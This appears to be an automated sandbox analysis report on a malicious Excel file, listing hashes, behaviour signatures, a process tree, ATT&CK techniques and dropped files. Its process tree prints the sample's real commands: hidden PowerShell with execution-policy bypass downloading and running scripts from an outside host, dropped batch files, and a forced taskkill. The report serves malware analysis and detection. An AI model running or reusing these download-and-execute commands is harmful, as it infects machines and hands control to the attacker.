Analysis

  • max time kernel
    153s
  • max time network
    49s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    16-08-2022 07:46

General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls

  • Size

    33KB

  • MD5

    fba667decfca0daf6f92277fec2d16cf

  • SHA1

    e78d07658f5a3461d43f4a84747455ef025eab09

  • SHA256

    3ae788e07d265a5c6d9d79c13aea5769812c205d22a89b338ab8764cd9b364f1

  • SHA512

    04e59d93c8fdda2461a4d353f2cf7de4e526a54d441bfb32ffd883bdbb3db6e2d5081be31d6da61fe06b24690515278766d852fff9db5c764099032abbafe048

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:992
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 80 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1900
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:608
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:672
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:952
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 85 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1136
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1144
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1972
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1180
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min taskkill /f /im WINWORD.EXE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im WINWORD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:372
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 7 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1584

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    f374758f17f1d3eee5fa9c535e858f1c

    SHA1

    9927a67363e0192b31e05fa487372e1dcdbdcdbe

    SHA256

    d0d73f44fa8c317c2c16f4a95bfd2f27a3ffddcf9d79e3ebcccf5d438cfa1b45

    SHA512

    e49de23c1b5b29cbd6ccf20a0466d1b3e223d2df7654c1cdd9e1962de863b86a812dd9030eb99f6529149df486646c424fff92330d381984d2b28ba28632f1aa

  • C:\Users\Public\DefenderFile.bat
    Filesize

    1KB

    MD5

    ae4a0997ce01f4ebbb3f3cc0054ce933

    SHA1

    e5bfe3b390f1208b8b6ea0317f4364005f552851

    SHA256

    a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

    SHA512

    5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

  • C:\Users\Public\Outlook.bat
    Filesize

    900B

    MD5

    0427a3545c2eaed3167cffe2cf5f8aba

    SHA1

    b27f3a7d2b855f1d0b84727603add711bb6f6170

    SHA256

    ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

    SHA512

    fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

  • memory/372-71-0x0000000000000000-mapping.dmp
  • memory/588-62-0x0000000000000000-mapping.dmp
  • memory/608-78-0x0000000000000000-mapping.dmp
  • memory/672-82-0x0000000073CD0000-0x000000007427B000-memory.dmp
    Filesize

    5.7MB

  • memory/672-79-0x0000000000000000-mapping.dmp
  • memory/952-60-0x0000000000000000-mapping.dmp
  • memory/992-59-0x0000000000000000-mapping.dmp
  • memory/1096-76-0x00000000722DD000-0x00000000722E8000-memory.dmp
    Filesize

    44KB

  • memory/1096-72-0x00000000722DD000-0x00000000722E8000-memory.dmp
    Filesize

    44KB

  • memory/1096-54-0x000000002F611000-0x000000002F614000-memory.dmp
    Filesize

    12KB

  • memory/1096-55-0x00000000712F1000-0x00000000712F3000-memory.dmp
    Filesize

    8KB

  • memory/1096-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1096-57-0x00000000722DD000-0x00000000722E8000-memory.dmp
    Filesize

    44KB

  • memory/1096-75-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1096-58-0x0000000075061000-0x0000000075063000-memory.dmp
    Filesize

    8KB

  • memory/1136-65-0x0000000000000000-mapping.dmp
  • memory/1144-61-0x0000000000000000-mapping.dmp
  • memory/1180-68-0x0000000000000000-mapping.dmp
  • memory/1584-66-0x0000000000000000-mapping.dmp
  • memory/1900-63-0x0000000000000000-mapping.dmp
  • memory/1920-69-0x0000000000000000-mapping.dmp
  • memory/1920-74-0x000000006B840000-0x000000006BDEB000-memory.dmp
    Filesize

    5.7MB

  • memory/1924-70-0x0000000000000000-mapping.dmp
  • memory/1972-64-0x0000000000000000-mapping.dmp